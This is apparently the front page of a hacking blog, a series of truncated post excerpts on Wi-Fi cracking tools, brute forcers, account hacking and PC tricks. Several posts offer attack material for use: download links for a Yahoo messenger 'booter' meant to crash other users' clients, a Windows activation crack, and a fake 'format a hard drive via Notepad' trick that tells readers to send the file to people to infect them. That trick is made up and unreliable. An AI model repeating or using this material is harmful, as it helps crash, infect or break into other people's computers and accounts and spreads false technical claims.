Welcome To The Hacker Club 4U
On This Blog Now You can get knowledge about how to to do hacking and also Know how to prevent from hacking and know many tips And tricks of computer and internet
Hacking
Click Here To Know Many Tricks and Tips Of HACKING facebook,twitter and other accounts and passwords
Hacking Safety And Security
Click Here to know how to protect your computer and inetrnet from hacking and know hacking safety and security tips and tricks
Facebook And Twitter
Click On Picture For TWITTER And Click On This Tittle For FACEBOOK .Hacking And Security Tips Of facebook and twitter.Know how to byepass facebook login and twitter login
Gmail And Yahoo
Click On Above Picture For GMAIL Hacking And Security Tips . And.Click On This Title For YAHOO Hacking and security tips
wifite – Mass Wifi WEP / WPA Cracker
To attack multiple WEP and WPA encrypted networks at the same time. this tool is customizable to be automated with only a few arguments. wifite can be trusted to run without supervision.
Features :
sorts targets by power (in dB); cracks closest access points first
automatically deauths clients of hidden networks to decloak SSIDs
numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc)
customizable settings (timeouts, packets/sec, channel, change mac address, ignore fake-auth, etc)
all...
Mozilla site exposed encrypted passwords
On December 17th, Mozilla was notified by a security researcher that a partial database of addons.mozilla.org user accounts was mistakenly left on a Mozilla public server. The security researcher reported the issue to us via our web bounty program. We were able to account for every download of the database. This issue posed minimal risk to users, however as a precaution we felt we should disclose this issue to people affected and err on the side of disclosure.
The database included 44,000 inactive accounts using older, md5-based password...
NiX – Linux Brute Forcer
NiX Brute Forcer is a tool that uses brute force in parallel to log into a system without having authentication credentials beforehand. This tool is intended to demonstrate the importance of choosing strong passwords. The goal of NiX is to support a variety of services that allow remote authentication such as: MySQL, SSH, FTP, IMAP. It is based on NiX Proxy Checker.
Features:
Basic Authorization & FORM support in both standard and HTTPS (SSL) mode
HTTP/SOCKS 4 and 5 proxy support
FORM auto-detection & Manual FORM input configuration.
It...
Black Hole By ReMi

Name : Black-Hole
Coder : -= ReMi =-
Nice One boot booter
Can crush messy & Clients
Next Version Coming Soon
Download :
http://www.2shared.com/file/4782142/d37b66d9/-Black-Hole-_By_-ReMi-.html
http://rapidshare.com/files/193003810/-Black-Hole-_By_-ReMi-.zip
http://www.filefactory.com/file/a04gc0e
http://uploaded.to/?id=owd...
How Yahoo Booter Works ?
Yahoo messenger can get into yahoo chat, but in reality, it’s a seperate service…
Yahoo Messenger’s server has a Buffer, this buffer is actually 128k not the 512k.
When the attacker sends multiple packets to you, what you don’t get from the server gets stored in a buffer, in comes a chat packet, the client grabs it, in comes 5 chat packets, you grab the first 3 packets, 2 are left behind on yahoo’s server, you then grab the 2 packets and then the buffer is back to empty.
Actually the booter sends 1k’s worth in 1 packet of PM (instant messaging...
How Privacy Attack Works And Which Software Do This

Here attacker uses various automated tools which are freely available on the internet. Some of them are as follows:
1) Trojan :- Trojan is a Remote Administration Tool (RAT) which enable attacker to execute various software and hardware instructions on the target system.
Most trojans consist of two parts -
a) The Server Part :- It has to be installed on the the victim's computer.
b) The Client Part :- It is installed on attacker's system. This part gives attacker complete...
How To Increase Virtual RAM - To Make Your System Faster
Follow the steps given below :-
1) Hold down the 'Windows' Key and Press the 'Pause/Break' button at the top right of your keyboard.
Another way is Right-Clicking 'My Computer' and then Select 'Properties'.
2) Click on the 'Advanced' tab.
3) Under 'Performance', click 'Settings'.
4) Then click the 'Advanced' tab on the button that pops up.
5) Under 'Virtual Memory' at the bottom, click 'Change'.
6) Click the 'Custom Size' button.
7) For the initial size (depending on your HD space), type in anywhere...
How Facebook virus spreads via photo album chat message

A new social networking worm in the vein of Koobface is currently doing the rounds.
Unlike the majority of Facebook scams, this one actively infects your computer with malware instead of simply tricking you into taking surveys and passing on messages to other users.
The link in his Facebook chat from a friend pointed to an app.facebook.com/CENSORED link. Typically when you go to a Facebook app page it prompts you to add the application and grant it permission to post on your behalf or read...
Windows Genuine Hack – 100% Works

Windows Genuine Hack :-
1) Download “Windows.Genuine.Advantage.Validation..rar”
2) Extract It.
3) Run “installer.bat” file.
4) Reboot.
5) Enjoy Your Validated Windows.
Download :
http://rapidshare.com/files/115531401/Windows.Genuine.Advantage.Validation.....
How To Format Hard Drive (HDD) Using Notepad
If you think that Notepad is useless then you are wrong because you can now do a lot of things with the Notepad which you could have never imagined. In this hack I will show you how to format a HDD using Notepad. This is really cool.
Step 1 :-
Copy The Following In Notepad Exactly as it is.
says01001011000111110010010101010101010000011111100000
Step 2 :-
Save As An EXE Any Name Will Do
Step 3 :-
Send the EXE to People And Infect
OR
IF you think cannot format C Drive when windows...
How to Create Folders And Files With NO! Name
This trick will allow you to create files and folders without any name.
Just follow the steps as given below :-
1) Select any file or folder.
2) Right click on it, select 'Rename' or simply press 'F2'.
3) Press and hold the 'Alt' key. While holding the Alt key, type numbers '0160' from the numpad.
Note :- Type the numbers '0160' from the numpad, that is, the numbers present on the right side of the keyboard.
Don’t type the numbers which are present on top of the character keys.
4)...
How To Do Wireless Hacking

Wireless networks broadcast their packets using radio frequency or optical wavelengths. A modern laptop computer can listen in. Worse, an attacker can manufacture new packets on the fly and persuade wireless stations to accept his packets as legitimate.
The step by step procerdure in wireless hacking can be explained with help of different topics as follows:-
1) Stations and Access Points :- A wireless network interface card (adapter) is a device, called...
Facebook Hack -View photo albums of non-friends on facebook

By following the simple steps shown in above image, you can bypass the security of Facebook and view photos of others online....